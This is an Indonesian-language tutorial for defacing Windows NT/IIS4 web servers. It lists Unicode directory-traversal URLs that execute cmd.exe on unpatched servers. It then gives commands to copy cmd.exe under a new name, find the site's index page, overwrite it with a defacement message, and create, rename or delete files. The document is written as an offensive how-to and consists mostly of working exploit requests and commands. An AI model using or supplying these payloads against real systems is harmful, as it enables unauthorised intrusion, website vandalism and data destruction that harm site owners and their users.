Tutorial Deface OS NT/IIS4
Langkah 1 : Cari
target
Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung
kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC,
scanner. Untuk basicnya mengetahui OS yang digunakan server suatu site dapat
diketahui dengan menggunakan site www.netcraft.com. juga dapat dilakukan di
search engine pada www.yahoo.com dengan menggunakan words .default.asp
Langkah 2 : Unicode
Setelah target didapat maka digunakan unicode. Unicode itu sendiri penulis juga
belum tahu secara mendetail, tapi pada dasarnya unicode menggunakan bahasa
ASCII.Server yg menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa
ditembus dengan unicode dalam hal ini bila server itu belum dipatch. Unicode yg
berhasil ditemukan untuk memasuki server NT sudah banyak. dan yang bisa dicoba
sbb:
http://target-loe/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/msdac/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
bila unicode tsb berhasil maka akan dapat dilihat tampilan seperti berikut:
Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT
Langkah 3 :cari file index.htm
Saat membuka browser site tsb pada ie kita melihat tampilan muka site tsb, perlu
diperhatikan adalah file tampilan tsb link menuju file apa? biasanya antara lain
:index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan
unicode tsb kita mencari file tsb letaknya dimana, biasanya di c:\inetpub\wwwroot
(hal ini belum tentu). untuk mencari file dapat digunakan perintah :
/c+dir/s+c:\index.htm
hal ini berarti perintah mencari file index.htm di dalam drive c
untuk mencek apakah file index.htm tsb yg dipergunakan pada tampilan site,
dipergunakan perintah :
/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm
setelah anda menemukan file index.htm tsb, maka sebaiknya anda copy dulu, hal
ini agar tindakan deface kita tidak terlalu merugikan admin server site
tsb.sehingga admin tsb mempunyai backup file index.
perintah copy itu sendiri adalah:
/c+copy+c:\
contoh untuk pencopyan adalah :/c+copy+c:\inetpub\wwwroot\index.htm
backupindex.htm
untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di
direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :
/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe
hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga
untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi
cukup /deface.exe?/
Langkah 4 : echo file index.htm
echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda
echo berarti anda timpa dengan file index anda. untuk perintahnya adalah:
/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\index.htm
sehingga tampilan site depan telah terganti dengan tulisan
deface was here
catatan: hal ini berlaku bila file index.htm tsb dapat diecho, krn sebagian
server membatasi direktory root dgn read only, sehingga perintah echo index.htm
akan menghasilkan :
acces denied
untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa html dan
ASCII
perintah-perintah lain :
membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file